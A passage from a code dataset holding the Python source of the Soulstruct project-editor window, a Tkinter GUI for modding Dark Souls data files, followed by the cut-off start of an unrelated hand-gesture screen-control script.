\"\n \"The name of the directory will be the name of the project.\",\n 50,\n ),\n )\n project_path = self.FileDialog.askdirectory(\n title=\"Choose Soulstruct project directory\", initialdir=str(Path(\"~/Documents\").expanduser())\n )\n if not project_path:\n self.CustomDialog(title=\"Project Error\", message=\"No directory chosen. Quitting Soulstruct.\")\n raise SoulstructProjectError(\"No directory chosen. Quitting Soulstruct.\")\n\n self.toplevel.title(f\"{self.PROJECT_CLASS.GAME.name} Project Editor: {Path(project_path)}\")\n\n try:\n self.project = self.PROJECT_CLASS(project_path, with_window=self, game_root=game_root)\n _LOGGER.info(f\"Opened project: {project_path}\")\n except SoulstructProjectError as e:\n self.deiconify()\n msg = (\n f\"Fatal Soulstruct project error encountered (see log for full traceback):\\n\\n\"\n f\"{word_wrap(str(e), 50)}\\n\\nAborting startup.\"\n )\n _LOGGER.exception(\"Fatal Soulstruct project error encountered. Aborting startup.\")\n self.CustomDialog(title=\"Project Error\", message=msg)\n raise\n except Exception as e:\n self.deiconify()\n _LOGGER.exception(\"Fatal internal error encountered. Aborting startup.\")\n msg = (\n f\"Fatal internal error encountered (see log for full traceback):\"\n f\"\\n\\n{word_wrap(str(e), 50)}\\n\\nAborting startup.\"\n )\n self.CustomDialog(title=\"Internal Error\", message=msg)\n raise\n\n self.linker = self.LINKER_CLASS(self) # TODO: Individual editors should have a lesser linker.\n\n with self.set_master(column_weights=[1], row_weights=[0, 1], auto_rows=0, sticky=\"nsew\"):\n self.global_ribbon = self.Frame(row_weights=[1], column_weights=[1, 1, 1, 1], pady=(10, 5))\n self.page_tabs = self.Notebook(name=\"project_notebook\", sticky=\"nsew\")\n\n self.maps_tab = None\n self.entities_tab = None\n self.params_tab = None\n self.text_tab = None\n self.lighting_tab = None\n self.events_tab = None\n self.ai_tab = None\n self.talk_tab = None\n self.runtime_tab = None\n self.extra_tabs = []\n\n self.save_all_button = None\n self.save_tab_button = None\n self.export_all_button = None\n self.export_tab_button = None\n\n self.toplevel.minsize(700, 500)\n self.alphanumeric_word_boundaries()\n if getattr(sys, \"frozen\", False):\n self.toplevel.protocol(\"WM_DELETE_WINDOW\", self.confirm_quit)\n self.build()\n self.deiconify()\n\n if self.maps_tab:\n self.maps_tab.check_for_repeated_entity_ids()\n\n def build(self):\n self.build_top_menu()\n\n with self.set_master(self.global_ribbon, auto_columns=0, grid_defaults={\"padx\": 5}):\n self.save_all_button = self.Button(\n text=\"Save Entire Project\",\n width=20,\n bg=\"#622\",\n tooltip_text=\"Saves all project data types to local project files. (Ctrl + Shift + S)\",\n command=self._save_data,\n )\n self.save_tab_button = self.Button(\n text=\"Save Tab Data\",\n width=20,\n tooltip_text=\"Saves just the indicated data type to local project files. (Ctrl + S)\",\n command=lambda: self._save_data(self.current_data_type),\n )\n self.export_tab_button = self.Button(\n text=\"Export Tab Data\",\n width=20,\n tooltip_text=(\n \"Saves and exports just the indicated data type to the game directory. For Events/Talk, exports \"\n \"ONLY the currently selected script. (Ctrl + E)\"\n ),\n command=lambda: self._export_data(\n self.current_data_type,\n self.project.game_root,\n single_script_only=True,\n ),\n )\n self.export_all_button = self.Button(\n text=\"Export Entire Project\",\n width=20,\n bg=\"#622\",\n tooltip_text=\"Saves and exports ALL project data files to the game directory. 
(Ctrl + Shift + E)\",\n command=lambda: self._export_data(data_type=None, export_directory=self.project.game_root),\n )\n\n tab_frames = {\n tab_name: self.Frame(frame=self.page_tabs, sticky=\"nsew\", row_weights=[1], column_weights=[1])\n for tab_name in self.ordered_tabs\n }\n for tab_name in self.EXTRA_TAB_CLASSES:\n tab_frames[tab_name] = self.Frame(frame=self.page_tabs, sticky=\"nsew\", row_weights=[1], column_weights=[1])\n\n if \"maps\" in self.data_types:\n self.maps_tab = self.SmartFrame(\n frame=tab_frames[\"maps\"],\n smart_frame_class=self.MAPS_EDITOR_CLASS,\n project=self.project,\n character_models=self.CHARACTER_MODELS,\n global_map_choice_func=self.set_global_map_choice,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.maps_tab.bind(\"\", self._update_banner)\n\n self.entities_tab = self.SmartFrame(\n frame=tab_frames[\"entities\"],\n smart_frame_class=self.ENTITIES_EDITOR_CLASS,\n project=self.project,\n entities_directory=self.project.entities_directory,\n events_directory=self.project.project_root / \"events\",\n global_map_choice_func=self.set_global_map_choice,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.entities_tab.bind(\"\", self._update_banner)\n\n if \"params\" in self.data_types:\n self.params_tab = self.SmartFrame(\n frame=tab_frames[\"params\"],\n smart_frame_class=self.PARAMS_EDITOR_CLASS,\n project=self.project,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.params_tab.bind(\"\", self._update_banner)\n\n if \"lighting\" in self.data_types:\n self.lighting_tab = self.SmartFrame(\n frame=tab_frames[\"lighting\"],\n smart_frame_class=self.LIGHTING_EDITOR_CLASS,\n project=self.project,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.lighting_tab.bind(\"\", self._update_banner)\n\n if \"text\" in self.data_types:\n self.text_tab = self.SmartFrame(\n frame=tab_frames[\"text\"],\n smart_frame_class=self.TEXT_EDITOR_CLASS,\n project=self.project,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.text_tab.bind(\"\", self._update_banner)\n\n if \"events\" in self.data_types:\n self.events_tab = self.SmartFrame(\n frame=tab_frames[\"events\"],\n smart_frame_class=self.EVENT_EDITOR_CLASS,\n project=self.project,\n evs_directory=self.project.project_root / \"events\",\n game_root=self.project.game_root,\n global_map_choice_func=self.set_global_map_choice,\n text_font_size=self.project.text_editor_font_size,\n sticky=\"nsew\",\n )\n self.events_tab.bind(\"\", self._update_banner)\n\n if \"ai\" in self.data_types:\n self.ai_tab = self.SmartFrame(\n frame=tab_frames[\"ai\"],\n smart_frame_class=self.AI_EDITOR_CLASS,\n project=self.project,\n script_directory=self.project.project_root / \"ai_scripts\",\n export_directory=self.project.get_game_path_of_data_type(\"ai\"),\n allow_decompile=self.project.GAME.name == \"Dark Souls Remastered\",\n global_map_choice_func=self.set_global_map_choice,\n text_font_size=self.project.text_editor_font_size,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.ai_tab.bind(\"\", self._update_banner)\n\n if \"talk\" in self.data_types:\n self.talk_tab = self.SmartFrame(\n frame=tab_frames[\"talk\"],\n smart_frame_class=self.TALK_EDITOR_CLASS,\n project=self.project,\n esp_directory=self.project.project_root / \"talk\",\n global_map_choice_func=self.set_global_map_choice,\n text_font_size=self.project.text_editor_font_size,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.talk_tab.bind(\"\", self._update_banner)\n\n if self.RUNTIME_MANAGER_CLASS:\n self.runtime_tab = self.SmartFrame(\n frame=tab_frames[\"runtime\"],\n 
smart_frame_class=self.RUNTIME_MANAGER_CLASS,\n project=self.project,\n sticky=\"nsew\",\n )\n self.runtime_tab.bind(\"\", self._update_banner)\n\n for tab_name, smart_frame_class in self.EXTRA_TAB_CLASSES.items():\n extra_tab = self.SmartFrame(\n frame=tab_frames[tab_name],\n smart_frame_class=smart_frame_class,\n project=self.project,\n sticky=\"nsew\",\n )\n extra_tab.bind(\"\", self._update_banner)\n self.extra_tabs.append(extra_tab)\n\n for tab_name, tab_frame in tab_frames.items():\n self.page_tabs.add(tab_frame, text=f\" {data_type_caps(tab_name)} \")\n\n self.create_key_bindings()\n\n self.set_geometry()\n\n def build_top_menu(self):\n top_menu = self.Menu()\n\n file_menu = self.Menu()\n self._build_file_menu(file_menu)\n top_menu.add_cascade(label=\"File\", menu=file_menu)\n\n # TODO: edit commands\n # edit_menu = self.Menu()\n # edit_menu.add_command(label=\"Undo\", foreground='#FFF', command=lambda: print(\"Undo\"))\n # edit_menu.add_command(label=\"Redo\", foreground='#FFF', command=lambda: print(\"Redo\"))\n # edit_menu.add_command(label=\"Copy\", foreground='#FFF', command=lambda: print(\"Copy\"))\n # edit_menu.add_command(label=\"Cut\", foreground='#FFF', command=lambda: print(\"Cut\"))\n # edit_menu.add_command(label=\"Paste\", foreground='#FFF', command=lambda: print(\"Paste\"))\n # top_menu.add_cascade(label=\"Edit\", menu=edit_menu)\n\n tools_menu = self.Menu()\n self._build_tools_menu(tools_menu)\n top_menu.add_cascade(label=\"Tools\", menu=tools_menu)\n\n scripts_menu = self.Menu()\n self._build_scripts_menu(scripts_menu)\n top_menu.add_cascade(label=\"Scripts\", menu=scripts_menu)\n\n self.toplevel.config(menu=top_menu)\n\n def _build_file_menu(self, file_menu):\n save_submenu = self.Menu()\n self._build_save_submenu(save_submenu)\n file_menu.add_cascade(label=\"Save\", foreground=\"#FFF\", menu=save_submenu)\n\n file_menu.add_separator()\n\n reload_submenu = self.Menu()\n self._build_reload_submenu(reload_submenu)\n file_menu.add_cascade(label=\"Reload\", foreground=\"#FFF\", menu=reload_submenu)\n\n file_menu.add_separator()\n\n import_from_game_submenu = self.Menu()\n self._build_import_submenu(import_from_game_submenu, self.project.game_root)\n file_menu.add_cascade(label=\"Import from Game\", foreground=\"#FFF\", menu=import_from_game_submenu)\n\n import_from_submenu = self.Menu()\n self._build_import_submenu(import_from_submenu, None)\n file_menu.add_cascade(label=\"Import from...\", foreground=\"#FFF\", menu=import_from_submenu)\n\n file_menu.add_separator()\n\n export_to_game_submenu = self.Menu()\n self._build_export_submenu(export_to_game_submenu, self.project.game_root)\n file_menu.add_cascade(label=\"Export to Game\", foreground=\"#FFF\", menu=export_to_game_submenu)\n\n export_to_submenu = self.Menu()\n self._build_export_submenu(export_to_submenu, None)\n file_menu.add_cascade(label=\"Export to...\", foreground=\"#FFF\", menu=export_to_submenu)\n\n file_menu.add_separator()\n\n file_menu.add_command(label=\"Set as Default Project\", foreground=\"#FFF\", command=self._set_as_default_project)\n file_menu.add_command(label=\"Clear Default Project\", foreground=\"#FFF\", command=self._clear_default_project)\n\n file_menu.add_separator()\n\n file_menu.add_command(label=\"Quit\", foreground=\"#FFF\", command=self.confirm_quit)\n\n def _build_save_submenu(self, save_menu):\n save_menu.add_command(label=\"Save Entire Project\", foreground=\"#FFF\", command=self._save_data)\n save_menu.add_separator()\n for data_type in self.data_types:\n save_menu.add_command(\n 
label=f\"Save {data_type_caps(data_type)}\",\n foreground=\"#FFF\",\n command=lambda d=data_type: self._save_data(d),\n )\n\n def _build_reload_submenu(self, reload_menu):\n reload_menu.add_command(label=\"Reload Entire Project\", foreground=\"#FFF\", command=self._reload_data)\n reload_menu.add_separator()\n for data_type in self.data_types:\n reload_menu.add_command(\n label=f\"Reload {data_type_caps(data_type)}\",\n foreground=\"#FFF\",\n command=lambda d=data_type: self._reload_data(d),\n )\n\n def _build_import_submenu(self, import_menu, import_dir):\n import_menu.add_command(\n label=f\"Import Everything\",\n foreground=\"#FFF\",\n command=lambda i=import_dir: self._import_data(import_directory=i),\n )\n import_menu.add_separator()\n for data_type in self.data_types:\n import_menu.add_command(\n label=f\"Import {data_type_caps(data_type)}\",\n foreground=\"#FFF\",\n command=lambda d=data_type, i=import_dir: self._import_data(d, import_directory=i),\n )\n\n def _build_export_submenu(self, export_menu, export_dir):\n export_menu.add_command(\n label=f\"Export Everything\",\n foreground=\"#FFF\",\n command=lambda e=export_dir: self._export_data(export_directory=e),\n )\n export_menu.add_separator()\n for data_type in self.data_types:\n export_menu.add_command(\n label=f\"Export {data_type_caps(data_type)}\",\n foreground=\"#FFF\",\n command=lambda d=data_type, e=export_dir: self._export_data(d, export_directory=e),\n )\n\n def _build_tools_menu(self, tools_menu):\n tools_menu.add_command(label=\"Create Game Backup\", foreground=\"#FFF\", command=self._create_game_backup)\n tools_menu.add_command(label=\"Restore Game Backup\", foreground=\"#FFF\", command=self._restore_game_backup)\n tools_menu.add_separator()\n tools_menu.add_command(\n label=\"Restore .bak File\", foreground=\"#FFF\", command=lambda: self._restore_backup(full_folder=False)\n )\n tools_menu.add_command(\n label=\"Restore .bak Files\", foreground=\"#FFF\", command=lambda: self._restore_backup(full_folder=True)\n )\n tools_menu.add_separator()\n tools_menu.add_command(label=\"Unpack BND\", foreground=\"#FFF\", command=self._unpack_binder)\n tools_menu.add_command(label=\"Repack BND\", foreground=\"#FFF\", command=self._repack_binder)\n return tools_menu\n\n def _build_scripts_menu(self, scripts_menu):\n for script in self.project.custom_script_directory.rglob(\"*.py\"):\n if script.name.startswith(\"_\"):\n continue # skipped\n scripts_menu.add_command(label=script.stem, foreground=\"#FFF\", command=lambda s=script: self._run_script(s))\n scripts_menu.add_separator()\n scripts_menu.add_command(label=\"Open Console\", foreground=\"#FFF\", command=self._open_console)\n\n def _run_script(self, script_path: Path):\n \"\"\"Run given Python script `script_path` in a subprocess and wait for it to return.\"\"\"\n completed_process = self.project.run_script(script_path.absolute()) # same stdout and stderr\n if completed_process.returncode != 0:\n self.CustomDialog(\n title=\"Script Error\",\n message=f\"Script '{script_path.name}' encountered an error. 
It may have only partially completed.\",\n )\n return\n self.CustomDialog(\n title=\"Script Successful\",\n message=f\"Script '{script_path.name}' ran successfully.\",\n )\n\n def _open_console(self):\n try:\n # noinspection PyPackageRequirements\n import IPython\n except ImportError:\n self.CustomDialog(\n title=\"Console Error\",\n message=\"Interactive console requires the `ipython` package to be installed\\n\"\n \"in your Python environment.\",\n )\n _LOGGER.info(f\"Interactive console aborted. `ipython` package is not installed.\")\n return\n\n _LOGGER.info(\"Starting interactive console in new window. Note that it will load the LAST SAVED project data.\")\n result = subprocess.run(\n [sys.executable, \"-m\", \"soulstruct\", \"--console\", str(self.project.project_root)],\n creationflags=subprocess.CREATE_NEW_CONSOLE,\n )\n if result.returncode not in {0, 3221225786}: # second code is for window close\n self.CustomDialog(\n title=\"Console Error\",\n message=\"Interactive console encountered an error and terminated.\\n\\n\"\n \"Project data has not been reloaded, as it may have been corrupted.\\n\"\n \"If you believe the console may have written malformed data, make\\n\"\n \"sure to save your project files again from the GUI before closing it\\n.\"\n \"Otherwise, use File > Reload to load any new data written by the console.\\n\",\n )\n _LOGGER.info(f\"Interactive console exited with an unexpected return code: {result.returncode}\")\n return\n _LOGGER.info(\"Interactive console exited properly.\")\n if (\n self.CustomDialog(\n title=\"Reload Project Data?\",\n message=\"Reload maps, params, lighting, and text data to acquire any changes made in the console?\",\n button_names=(\"Yes, reload data\", \"No, do nothing\"),\n button_kwargs=(\"YES\", \"NO\"),\n cancel_output=1,\n default_output=1,\n )\n ) == 0:\n for data_type in self.project.DATA_TYPES:\n if data_type not in {\"maps\", \"params\", \"lighting\", \"text\"}:\n continue\n self.project.load(data_type)\n\n def alphanumeric_word_boundaries(self):\n \"\"\"See: http://www.tcl.tk/man/tcl8.5/TclCmd/library.htm#M19\"\"\"\n self.tk.call(\"tcl_wordBreakAfter\", \"\", 0)\n self.tk.call(\"set\", \"tcl_wordchars\", \"[a-zA-Z0-9_.]\")\n self.tk.call(\"set\", \"tcl_nonwordchars\", \"[^a-zA-Z0-9_.]\")\n\n def create_key_bindings(self):\n self.bind_all(\"\", lambda _: self._save_data(self.current_data_type, mimic_click=True))\n self.bind_all(\"\", lambda _: self._save_data(mimic_click=True))\n self.bind_all(\n \"\",\n lambda _: self._export_data(\n self.current_data_type, export_directory=self.project.game_root, mimic_click=True\n ),\n )\n self.bind_all(\n \"\", lambda _: self._export_data(export_directory=self.project.game_root, mimic_click=True)\n )\n\n def refresh_tab_data(self, data_type=None):\n if data_type is None:\n for data_type in self.data_types:\n self.refresh_tab_data(data_type)\n data_type = data_type.lower()\n if data_type not in self.data_types:\n raise ValueError(f\"Invalid data type name: {data_type}\")\n\n if data_type == \"events\":\n self.events_tab.scan_evs_files()\n self.events_tab.refresh()\n elif data_type == \"talk\":\n self.talk_tab.refresh()\n elif data_type == \"entities\":\n self.entities_tab.maps = self.project.maps\n self.entities_tab.refresh_entries()\n else:\n if data_type == \"params\":\n self.params_tab.refresh_entries()\n elif data_type == \"maps\":\n self.maps_tab.refresh_entries()\n self.maps_tab.check_for_repeated_entity_ids()\n elif data_type == \"lighting\":\n self.lighting_tab.refresh_entries()\n elif 
data_type == \"text\":\n self.text_tab.refresh_entries()\n\n def confirm_quit(self):\n if (\n self.CustomDialog(\n title=\"Quit Soulstruct?\",\n message=\"Quit Soulstruct? Any unsaved changes will be lost.\",\n button_names=(\"Yes, quit\", \"No, go back\"),\n button_kwargs=(\"YES\", \"NO\"),\n cancel_output=1,\n default_output=1,\n )\n == 0\n ):\n self.destroy()\n\n def destroy(self):\n \"\"\"Destruction takes a second or so, so we withdraw first to hide the awkward lag.\"\"\"\n self.withdraw()\n super().destroy()\n\n @property\n def current_data_type(self):\n \"\"\"Return name of current tab's data type. Could be 'runtime'.\"\"\"\n tab_index = self.page_tabs.index(self.page_tabs.select())\n data_type = self.ordered_tabs[tab_index]\n if data_type == \"entities\":\n return \"maps\"\n return data_type\n\n def set_global_map_choice(self, map_id, ignore_tabs=()):\n data_types = self.data_types\n if \"maps\" not in data_types:\n # Cannot get map to set it globally.\n return\n # noinspection PyUnresolvedReferences\n game_map = self.PROJECT_CLASS.DATA_TYPES[\"maps\"].GET_MAP(map_id)\n if \"maps\" not in ignore_tabs:\n if game_map.msb_file_stem is not None:\n self.maps_tab.map_choice.var.set(f\"{game_map.msb_file_stem} [{game_map.verbose_name}]\")\n self.maps_tab.on_map_choice()\n if \"entities\" not in ignore_tabs:\n if game_map.msb_file_stem is not None:\n self.entities_tab.map_choice.var.set(f\"{game_map.msb_file_stem} [{game_map.verbose_name}]\")\n self.entities_tab.on_map_choice()\n if \"events\" in data_types and \"events\" not in ignore_tabs:\n if game_map.emevd_file_stem is not None:\n self.events_tab.map_choice.var.set(f\"{game_map.emevd_file_stem} [{game_map.verbose_name})\")\n self.events_tab.on_map_choice()\n if \"ai\" in data_types and \"ai\" not in ignore_tabs:\n if game_map.ai_file_stem is not None:\n self.ai_tab.map_choice.var.set(f\"{game_map.ai_file_stem} [{game_map.verbose_name}]\")\n self.ai_tab.on_map_choice()\n if \"talk\" in data_types and \"talk\" not in ignore_tabs:\n if game_map.esd_file_stem is not None:\n self.talk_tab.map_choice.var.set(f\"{game_map.esd_file_stem} [{game_map.verbose_name}]\")\n self.talk_tab.on_map_choice()\n\n def _import_data(self, data_type=None, import_directory=None):\n if import_directory is None:\n import_directory = self._choose_directory()\n if not import_directory:\n return # Abort import.\n\n try:\n self._thread_with_loading_dialog(\n \"Importing\",\n f\"Importing {data_type_caps(data_type) if data_type is not None else 'all files'}...\",\n self.project.import_data,\n data_type,\n import_directory,\n )\n except Exception as ex:\n message = (\n f\"Error occurred while importing data:\\n\\n{ex}\\n\\n\"\n f\"Import operation may have only partially completed.\"\n )\n return self.CustomDialog(title=\"Import Error\", message=message)\n\n self.refresh_tab_data(data_type)\n\n def _save_data(self, data_type=None, mimic_click=False, single_script_only=False):\n if data_type == \"runtime\":\n return # nothing to save\n elif data_type == \"events\":\n # Saves '.evs.py' file(s) to project 'events' directory.\n self.events_tab.save_selected_evs() if single_script_only else self.events_tab.save_all_evs()\n if mimic_click:\n self.mimic_click(self.save_tab_button)\n return\n elif data_type == \"talk\":\n self.talk_tab.save_selected_esp()\n if mimic_click:\n self.mimic_click(self.save_tab_button)\n return\n elif data_type == \"ai\" and self.ai_tab.confirm_button[\"state\"] == \"normal\":\n self.ai_tab.confirm_selected(mimic_click=mimic_click)\n # doesn't 
return here\n\n if mimic_click:\n self.mimic_click(self.save_all_button if data_type is None else self.save_tab_button)\n\n self.project.save(data_type)\n if data_type is None:\n self.events_tab.save_selected_evs() if single_script_only else self.events_tab.save_all_evs()\n self.flash_bg(self)\n\n def _reload_data(self, data_type=None):\n if data_type is None:\n message = \"Are you sure you want to reload all project data? Any unsaved changes will be lost.\"\n else:\n message = f\"Are you sure you want to reload project {data_type} data? Any unsaved changes will be lost.\"\n if (\n self.CustomDialog(\n title=\"Reload Project Data?\",\n message=message,\n button_names=(\"Yes, reload data\", \"No, do nothing\"),\n button_kwargs=(\"YES\", \"NO\"),\n cancel_output=1,\n default_output=1,\n )\n ) != 0:\n return\n if data_type == \"runtime\":\n return # nothing to reload\n elif data_type == \"events\":\n # No need to reload `EMEVDDirectory` instance.\n self.events_tab.scan_evs_files()\n self.events_tab.refresh()\n return\n elif data_type == \"talk\":\n # No need to reload `TalkDirectory` instance.\n self.talk_tab.refresh()\n return\n\n self.project.load(data_type)\n self.flash_bg(self)\n\n def _export_data(self, data_type=None, export_directory=None, mimic_click=False, single_script_only=False):\n if export_directory is None:\n export_directory = self._choose_directory()\n if not export_directory:\n return # Abort export.\n if single_script_only and data_type is not None:\n if data_type == \"events\":\n # Specifying 'events' here means the selected script only.\n self.events_tab.save_selected_evs()\n self.mimic_click(self.save_tab_button)\n self.events_tab.export_selected_evs(export_directory)\n if mimic_click:\n self.mimic_click(self.export_tab_button)\n return\n elif data_type == \"talk\":\n # All talk scripts in selected map are exported.\n if self.talk_tab.active_row_index is not None:\n self.talk_tab.save_selected_esp()\n self.mimic_click(self.save_tab_button)\n self.talk_tab.export_all_in_map(export_directory)\n if mimic_click:\n self.mimic_click(self.export_tab_button)\n return\n # Otherwise, ignore `single_script_only` argument.\n\n if mimic_click:\n self.mimic_click(self.export_all_button if data_type is None else self.export_tab_button)\n\n try:\n self._thread_with_loading_dialog(\n \"Exporting\",\n f\"Exporting {data_type_caps(data_type) if data_type is not None else 'all files'}...\",\n self.project.export_data,\n data_type,\n export_directory,\n )\n except Exception as ex:\n caps = data_type_caps(data_type) if data_type is not None else \"all\"\n _LOGGER.error(f\"Error occurred while exporting {caps} data.\", exc_info=ex)\n message = (\n f\"Error occurred while exporting {caps} data:\\n\\n{str(ex)}\\n\\n\"\n f\"See full traceback in log. Export operation may have only partially completed.\"\n )\n if \" object has no attribute \" in str(ex):\n message += (\n f\"\\n\\nThis error may have occurred because of a change in Soulstruct's internal data.\\n\"\n f\"If you recently updated Soulstruct before seeing this error, try exporting {caps}\\n\"\n f\"with the older version (File > Export to... > Export {caps}), then importing those\\n\"\n f\"exported game files into this new version of Soulstruct (File > Import from... 
>\\n\"\n                f\"Import {caps}).\\n\\n\"\n                f\"These format-changing updates will only happen while we are\\n\"\n                f\"discovering the correct data types for the handful of remaining unknown variables.\"\n            )\n        return self.CustomDialog(title=\"Export Error\", message=message)\n\n    def _restore_backup(self, target=None, full_folder=False):\n        if target is None:\n            if full_folder:\n                target = self.FileDialog.askdirectory(\n                    title=\"Choose Folder to Restore Backups\", initialdir=str(self.project.game_root)\n                )\n            else:\n                target = self.FileDialog.askopenfilename(\n                    title=\"Choose File to Restore Backup\",\n                    initialdir=str(self.project.game_root),\n                    filetypes=[(\"Bak file\", \".bak\")],\n                )\n            if not target:\n                return\n        try:\n            count = self.project.restore_backup(target=target)\n        except RestoreBackupError as e:\n            return self.CustomDialog(title=\"Restore Backup Error\", message=str(e))\n        if count:\n            return self.CustomDialog(\n                title=\"Restore Successful\", message=f\"{count} '.bak' files restored in folder\\n'{str(target)}'.\"\n            )\n        return self.CustomDialog(\"Restore Successful\", f\"Backup file '{str(target)}' restored.\")\n\n    def _unpack_binder(self):\n        target = self.FileDialog.askopenfilename(\n            title=\"Choose BND/BHD/BDT File to Unpack\", initialdir=str(self.project.game_root)\n        )\n        if not target:\n            return  # the file dialog returns an empty string when cancelled\n        if not re.match(r\".*\\.[a-z]*(bnd|bhd|bdt)(\\.dcx)?$\", target):\n            return self.CustomDialog(\n                title=\"Invalid BND/BHD/BDT File\",\n                message=f\"A BND/BHD/BDT file (with or without DCX) must be selected.\",\n            )\n        Binder(target).write_unpacked_dir()\n\n    def _repack_binder(self):\n        target = self.FileDialog.askdirectory(\n            title=\"Choose Unpacked BND/BHD/BDT Directory to Repack\", initialdir=str(self.project.game_root)\n        )\n        if not target:\n            return  # the directory dialog returns an empty string when cancelled\n        if not re.match(r\".*\\.[a-z]*(bnd|bhd|bdt).*\", target):\n            return self.CustomDialog(\n                title=\"Invalid Directory\",\n                message=f\"An unpacked BND/BHD/BDT directory (with a 'binder_manifest.json' file) must be selected.\",\n            )\n        Binder(target).write()\n\n    def _set_as_default_project(self):\n        \"\"\"Set this project directory as the Soulstruct default in `config.py`.\"\"\"\n        from soulstruct.config import SET_CONFIG\n\n        SET_CONFIG(DEFAULT_PROJECT_PATH=str(self.project.project_root))\n\n    @staticmethod\n    def _clear_default_project():\n        from soulstruct.config import SET_CONFIG\n\n        SET_CONFIG(DEFAULT_PROJECT_PATH=\"\")\n\n    def _create_game_backup(self):\n        backup_path = self.project.game_root / \"soulstruct-backup\"\n        if backup_path.is_dir():\n            if (\n                self.CustomDialog(\n                    title=\"Confirm Backup Overwrite\",\n                    message=\"Backup directory `soulstruct-backup` in game directory already exists. 
Overwrite?\",\n button_names=(\"Yes, overwrite\", \"No, go back\"),\n button_kwargs=(\"YES\", \"NO\"),\n cancel_output=1,\n default_output=1,\n )\n == 1\n ):\n return\n try:\n self.project.create_game_backup(backup_path)\n except Exception as e:\n self.CustomDialog(\n \"Backup Error\",\n f\"Error while creating game file backup:\\n\\n\"\n f\"{e}\\n\\n\"\n f\"Backup may have only been partially completed.\",\n )\n _LOGGER.error(f\"Error while creating game file backup: {e}\", exc_info=True)\n else:\n self.CustomDialog(\"Backup Creation Successful\", \"Backup files created successfully.\")\n\n def _restore_game_backup(self):\n backup_path = self.project.game_root / \"soulstruct-backup\"\n if not backup_path.is_dir():\n self.CustomDialog(\n \"No Backup Created\", \"Backup folder `soulstruct-backup` has not yet been created in game directory.\"\n )\n return\n if (\n self.CustomDialog(\n title=\"Confirm Backup Restore\",\n message=\"Are you sure you want to restore backup Dark Souls files?\",\n button_names=(\"Yes, continue\", \"No, go back\"),\n button_kwargs=(\"YES\", \"NO\"),\n cancel_output=1,\n default_output=1,\n )\n == 1\n ):\n return\n try:\n self.project.restore_game_backup(backup_path)\n except Exception as e:\n self.CustomDialog(\n \"Backup Error\",\n f\"Error while restoring game file backup:\\n\\n\"\n f\"{e}\\n\\n\"\n f\"Backup files may have been only partially restored.\",\n )\n _LOGGER.error(f\"Error while restoring game file backup: {e}\", exc_info=True)\n else:\n self.CustomDialog(\"Backup Restore Successful\", \"All backup files restored successfully.\")\n\n def _choose_directory(self, initial_dir=None, **kwargs):\n if initial_dir is None:\n initial_dir = str(self.project.project_root)\n directory = self.FileDialog.askdirectory(initialdir=initial_dir, **kwargs)\n if not directory:\n return None\n return Path(directory)\n\n def _update_banner(self, event):\n try:\n data_name = event.widget.DATA_NAME\n except AttributeError:\n raise AttributeError(f\"No `DATA_NAME` for widget: {type(event.widget)}\")\n if data_name is None:\n self.save_tab_button.var.set(f\"Save\")\n self.export_tab_button.var.set(f\"Export\")\n self.save_tab_button[\"state\"] = \"disabled\"\n self.export_tab_button[\"state\"] = \"disabled\"\n else:\n self.save_all_button[\"state\"] = \"normal\"\n self.save_tab_button[\"state\"] = \"normal\"\n self.export_all_button[\"state\"] = \"normal\"\n self.export_tab_button[\"state\"] = \"normal\"\n if data_name == \"Events\":\n self.save_tab_button.var.set(f\"Save Event Script\")\n self.export_tab_button.var.set(f\"Export Event Script\")\n elif data_name == \"AI\":\n self.save_tab_button.var.set(f\"Save All AI\")\n self.export_tab_button.var.set(f\"Export All AI\")\n elif data_name == \"Talk\":\n self.save_tab_button.var.set(f\"Save Talk Script\")\n self.export_tab_button.var.set(f\"Export All Talk in Map\")\n else:\n self.save_tab_button.var.set(f\"Save {data_name}\")\n self.export_tab_button.var.set(f\"Export {data_name}\")\n\n def _thread_with_loading_dialog(self, dialog_title: str, dialog_message: str, func: tp.Callable, *args, **kwargs):\n \"\"\"Run `func(*args, **kwargs)` in another thread while displaying an animated loading dialog in the main thread.\n\n Returns or raises anything returned or raised by the threaded function.\n \"\"\"\n\n output = Queue()\n errors = Queue()\n\n def _threaded_func():\n try:\n result = func(*args, **kwargs)\n except Exception as thread_ex:\n errors.put(thread_ex)\n else:\n output.put(result)\n\n loading_dialog = 
self.LoadingDialog(title=dialog_title, message=dialog_message, maximum=20)\n        import_thread = threading.Thread(target=_threaded_func)\n        import_thread.start()\n        loading_dialog.update()\n        loading_dialog.progress.start()\n        while import_thread.is_alive():\n            loading_dialog.update()\n            time.sleep(1 / 60)\n        loading_dialog.progress.stop()\n        loading_dialog.destroy()\n\n        if not errors.empty():\n            raise errors.get()\n        return output.get()\n\n    @property\n    def data_types(self) -> tuple[str, ...]:\n        return tuple(self.PROJECT_CLASS.DATA_TYPES)\n\n    @property\n    def ordered_tabs(self) -> list[str]:\n        editor_tabs = [\n            tab_name for tab_name in TAB_EDITORS\n            if tab_name in self.PROJECT_CLASS.DATA_TYPES\n            or (tab_name == \"entities\" and \"maps\" in self.PROJECT_CLASS.DATA_TYPES)\n        ]\n        if self.RUNTIME_MANAGER_CLASS:\n            return editor_tabs + [\"runtime\"]\n        return editor_tabs\n\n\ndef data_type_caps(data_type: str):\n    return \"AI\" if data_type.lower() == \"ai\" else data_type.capitalize()\n","repo_name":"Grimrukh/soulstruct","sub_path":"soulstruct/base/project/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":41206,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"37"} +{"seq_id":"41672784105","text":"# -*- coding: utf-8 -*-\n\nimport copy\nimport os\nimport queue\nimport threading\nimport traceback\nimport logging\n\nimport cv2 as cv\nimport mediapipe as mp\nimport numpy as np\nimport pyautogui\n\nimport src.command_executor as com_exe\nfrom external.Kazuhito00.app_screen_control import calc_landmark_list, pre_process_landmark\nfrom external.Kazuhito00.model import KeyPointClassifier\n\nVIDEO_DEVICE_ID = 0\n(VIDEO_WIDTH, VIDEO_HEIGHT) = pyautogui.size()  # This gives the size of the main screen. N.B., the returned size\n                                                # might be smaller than the actual size if the user has scaled up the\n                                                # display size in the Windows settings\nVIDEO_WIDTH = 